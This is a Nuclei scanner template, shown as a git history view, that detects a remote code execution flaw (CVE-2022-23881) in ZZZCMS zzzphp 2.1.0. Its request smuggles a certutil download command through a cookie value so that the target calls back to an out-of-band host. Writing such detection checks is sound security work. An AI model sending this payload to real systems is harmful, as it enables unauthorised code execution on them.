nuclei-templates/cves/2022/CVE-2022-23881.yaml

38 lines
1.0 KiB
YAML
Raw Normal View History

2022-03-29 23:41:01 +00:00
id: CVE-2022-23881
info:
name: ZZZCMS zzzphp 2.1.0 - Remote Code Execution
2022-03-29 23:41:01 +00:00
author: pikpikcu
severity: critical
description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php.
2022-03-29 23:41:01 +00:00
reference:
- https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md
2022-04-02 10:25:31 +00:00
- http://www.zzzcms.com
- https://nvd.nist.gov/vuln/detail/CVE-2022-23881
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-23881
cwe-id: CWE-77
tags: cve,cve2022,rce,zzzphp,zzzcms
2022-03-29 23:41:01 +00:00
requests:
- raw:
- |
GET /?location=search HTTP/1.1
Host: {{Hostname}}
Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
2022-04-02 10:25:31 +00:00
- type: status
status:
- 500
# Enhanced by mp on 2022/04/19